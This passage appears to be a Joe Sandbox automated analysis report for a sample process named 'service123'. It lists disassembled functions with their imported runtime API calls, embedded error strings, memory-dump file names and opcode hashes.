Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 2361BF7960A3048FC710DF19C48065AF7E5AFC9308F548E2EE8D89BB54E731D94A8F96

Function 6C39AE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C39ACEF), ref: 6C455FF0
abort.MSVCRT(?,?,?,?,?,?,6C39AC4C,?,?,?,?,?,?,6C456040), ref: 6C455FF8
abort.MSVCRT(?,?,?,?,?,?,6C39AC4C,?,?,?,?,?,?,6C456040), ref: 6C456000
abort.MSVCRT(?,?,?,?,?,?,6C39AC4C,?,?,?,?,?,?,6C456040), ref: 6C456008

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b7088958c1eeab1190698fe08e99b824e929ab950e50441ed30a70d354d01f60
Instruction ID: f1e5d75499274a7d54bc63e1979985bbe970bca69de25a08afb96eaffab84938
Opcode Fuzzy Hash: b7088958c1eeab1190698fe08e99b824e929ab950e50441ed30a70d354d01f60
Instruction Fuzzy Hash: 7D41E871A093048FCB04EF68C481EEAB7E5EF8230CF54496DD4858BB15E7319459CB92

Function 6C381020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C381281,?,?,?,?,?,?,6C3813AE), ref: 6C381057
_amsg_exit.MSVCRT ref: 6C381086

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: cdde1c8266825b562f64edfbd04274bec87e8be06f1b6b6abd912321954c9e67
Instruction ID: 420949b56e1f3cd26fc61996075b752c9da44d094720a3409cd0c6c23aa4bc13
Opcode Fuzzy Hash: cdde1c8266825b562f64edfbd04274bec87e8be06f1b6b6abd912321954c9e67
Instruction Fuzzy Hash: 223173B170E2418BDB10EF9AD98179BBBF4EB46348F104529D5A48BB4CD636C445CFD2

Function 6C3A1CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3A1CC8
strlen.MSVCRT ref: 6C3A1CD2
memcpy.MSVCRT ref: 6C3A1CEF
setlocale.MSVCRT ref: 6C3A1D02
wcsftime.MSVCRT ref: 6C3A1D26
setlocale.MSVCRT ref: 6C3A1D38

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: 65fc5d54473cf7c2c76c10eb64676ae0fb3f0891e1e97af8348fee638ebeccff
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: 0A1192B0909310AFD740AF69C484A5EFBE4FF88654F41882DE4C987710E7799845CF92

Function 6C3A1A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3A1A18
strlen.MSVCRT ref: 6C3A1A22
memcpy.MSVCRT ref: 6C3A1A3F
setlocale.MSVCRT ref: 6C3A1A52
strftime.MSVCRT ref: 6C3A1A76
setlocale.MSVCRT ref: 6C3A1A88

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: a00628269288f0f1bd6d1f38555334cde3085da0ba4b9b13d956b4793f94008d
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: 9D11CEB4A09310AFC740AF68C084B5EFBE4FF88644F418C2EE4C98B701E7789844CB92

Function 6C38ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 9f290c97ab6f9d78383da044f39f88200662b01d7f818ba639042a908e7886dc
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 61B09231D8A26489C830A9AC4010BD6B21D9702388F40080AC2AA62D088652A047895A

Function 6C39DE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C39DEC7
LocalFree.KERNEL32 ref: 6C39DEFB

Strings

Unknown error code, xrefs: 6C39DF3C
basic_string: construction from null is not valid, xrefs: 6C39DF57

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 9eb0355b9316dd3ac1aa97f72274c603fdc2781fa325b4ee0e9d264688550445
Instruction ID: da179e25871d2493e66b39327f326d9ec3849ed8b5e2cf10d8dcad6919a9f4cb
Opcode Fuzzy Hash: 9eb0355b9316dd3ac1aa97f72274c603fdc2781fa325b4ee0e9d264688550445
Instruction Fuzzy Hash: 1A4167B2A046049BCB00EF69D486E9EFBF4EF85314F80882DE4859BB14E7719459CB93

Function 00CB2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00CB2E97
fputc.MSVCRT ref: 00CB2F07
memset.MSVCRT ref: 00CB2FC2

Strings

o, xrefs: 00CB2FCA
0, xrefs: 00CB2FB7

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 11fd946ec817c563e5cb6f6fa985e00134f1861b6bdb114ea3868047e7a8d981
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 6A316971A04345CBCB10DF6AC0847EABBF1BF58351F148929D999AB351D738ED04CB50

Function 6C393659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C393567
fputc.MSVCRT ref: 6C3935D7
memset.MSVCRT ref: 6C393692

Strings

o, xrefs: 6C39369A
0, xrefs: 6C393687

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 5020e42bc46ae31b29792c9ba0793d09143527605c6113875f0cfd63fbed0cc3
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 193159B1A093058FDB40CF69C0847AAB7F1BF48314F158629D999ABB41E335E804CF51

Function 6C389490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C3894C2
strlen.MSVCRT ref: 6C389616

Strings

_GLOBAL_, xrefs: 6C3894B7

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 4f4c8c909ea5d2363201e1dbbb8075eca5d49c106c692ab6da44865ead094aac
Instruction ID: 59c8342a1eb44576f82d6f66237af4925f55c069758aa49fd7a1f9712e887020
Opcode Fuzzy Hash: 4f4c8c909ea5d2363201e1dbbb8075eca5d49c106c692ab6da44865ead094aac
Instruction Fuzzy Hash: 31F18F70D063198FEB20CF29C8903DDBBF5AF46308F1441EAC499AB645D7769A89CF91

Function 6C3FD860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C41F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F70D
Part of subcall function 6C41F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F738

memcpy.MSVCRT ref: 6C3FDA65

Part of subcall function 6C4222E0: memcpy.MSVCRT(?,-00000001,?,6C3A724E,?,?,?,?,?,?,?,?,?,?,?,6C3A8BD5), ref: 6C42231C

Strings

basic_string::append, xrefs: 6C3FDB62, 6C3FDB6E
iostream error, xrefs: 6C3FDAB8
Unknown error, xrefs: 6C3FD8B8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: c687c987d1155cf86529e7b09d29439be18b6688dee1234d3fe5b9a665ba8c95
Instruction ID: 95b09deff54a668fc1258cfc9c1f392e32ba58f71c8d55ac64a96176a4dec33a
Opcode Fuzzy Hash: c687c987d1155cf86529e7b09d29439be18b6688dee1234d3fe5b9a665ba8c95
Instruction Fuzzy Hash: DEA10671D043188BCB10DFA8C484A9EBBB5BF44314F20892ED4A9ABB54D731A846CF92

Function 6C3EBD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3EBDEF
memcpy.MSVCRT ref: 6C3EBE49
memcpy.MSVCRT ref: 6C3EBED7

Part of subcall function 6C3EC2B0: memcpy.MSVCRT ref: 6C3EC33C

Strings

basic_string::replace, xrefs: 6C3EBF44, 6C3EBF57
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3EBF63

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: dcf2c08aede5e6deea7e20b25ff7fb12dd7e669b36a6ed359eafa931d2026b70
Instruction ID: cf838482f9069ad3a20d24d0a1da8c1b8b8853bc03502e4a8dc331b5cc813493
Opcode Fuzzy Hash: dcf2c08aede5e6deea7e20b25ff7fb12dd7e669b36a6ed359eafa931d2026b70
Instruction Fuzzy Hash: C9813672A057299FCB01DF28C48099EBBF1EF88358F11892AE8989B710D730D955CF96

Function 6C3F4DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3F4E80
memcpy.MSVCRT ref: 6C3F4ED4
memcpy.MSVCRT ref: 6C3F4F68

Part of subcall function 6C3F5340: memcpy.MSVCRT ref: 6C3F53D0

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3F4FF8
basic_string::replace, xrefs: 6C3F4FD9, 6C3F4FEC

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: b4a19f38e04bc2f5140916105dc7639336063413093bea2bad6a03a7346f4d30
Instruction ID: a43c105db700f4902f9e0785636c0d3f41940356994ed46ea23f1cdbf25072e6
Opcode Fuzzy Hash: b4a19f38e04bc2f5140916105dc7639336063413093bea2bad6a03a7346f4d30
Instruction Fuzzy Hash: 43811675A093059FCB00DF6CC58099EBBF5AF88258F11C92EE8A89B710D731D9558F92

Function 6C3FD5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C41F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F70D
Part of subcall function 6C41F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F738

strlen.MSVCRT ref: 6C3FD695
memcpy.MSVCRT ref: 6C3FD76E

Strings

iostream error, xrefs: 6C3FD7C2
Unknown error, xrefs: 6C3FD60E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: f6cba0b8c2f3e568c5146ee2de4e480b38099c92b9f322d50d39e765087c8b05
Instruction ID: 106ae428841a1611557ff9f41822f524cb23c15c1e711e0fed32df93018782b8
Opcode Fuzzy Hash: f6cba0b8c2f3e568c5146ee2de4e480b38099c92b9f322d50d39e765087c8b05
Instruction Fuzzy Hash: DC61C0B49043088FDB04DFA9C484B9EBBF1BF88314F24892ED4999B755E7749849CF92

Function 6C3A7561 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3A7583

Part of subcall function 6C3F3E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C3A7596), ref: 6C3F3E63

strlen.MSVCRT ref: 6C3A75F4
strlen.MSVCRT ref: 6C3A7662
strlen.MSVCRT ref: 6C3A76D6

Strings

@JFl, xrefs: 6C3A7576, 6C3A7657

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID: @JFl
API String ID: 3396830738-628771527
Opcode ID: 3dc57179c4717c7815333c13266b185ea092291bb79df08fc688ab99d23a517a
Instruction ID: 929bdb8b6eb4a87b07cfdc7db05d0a3900e3516c937540627dcf4848ca8920f3
Opcode Fuzzy Hash: 3dc57179c4717c7815333c13266b185ea092291bb79df08fc688ab99d23a517a
Instruction Fuzzy Hash: F95117B5A05A008FDB00EF29C198659FBF6FF46314F4185ADD8955F764DB31A80ACF82

Function 6C38F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C38F85F
ReleaseSemaphore.KERNEL32 ref: 6C38F8E3

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 8fa280e26010034ff0ce24f0423a40e8ad614ec1857ef0d19231b324a310c90a
Instruction ID: 6c89ad2eb1a312e271921f968f7a160c2fb619221036c2beaabf8efa78ceee2a
Opcode Fuzzy Hash: 8fa280e26010034ff0ce24f0423a40e8ad614ec1857ef0d19231b324a310c90a
Instruction Fuzzy Hash: B8314A7070A3018FDB10EF69D54870A7BF0FB4A318F95865DD85847288D336D945CF92

Function 6C38FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C38FCEC
ReleaseSemaphore.KERNEL32 ref: 6C38FD7C
CreateSemaphoreW.KERNEL32 ref: 6C38FDC7
WaitForSingleObject.KERNEL32 ref: 6C38FE10

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 8bd84b48fb10c259b7cff0ceb33305e387d339635856e8efbe1be494f2f11efd
Instruction ID: f23f6f1ee5ae9ec2246064beca8434044661a6a8fa7c01be5d0c0182043122c2
Opcode Fuzzy Hash: 8bd84b48fb10c259b7cff0ceb33305e387d339635856e8efbe1be494f2f11efd
Instruction Fuzzy Hash: B4310A7070A3018FDB10FF69D64870A7BF1FB4A718F518658D9588B288D336D949CFA2

Function 6C4482D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C4482E5
strlen.MSVCRT ref: 6C448333
memcpy.MSVCRT ref: 6C448350
setlocale.MSVCRT ref: 6C448364
setlocale.MSVCRT ref: 6C44839A

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
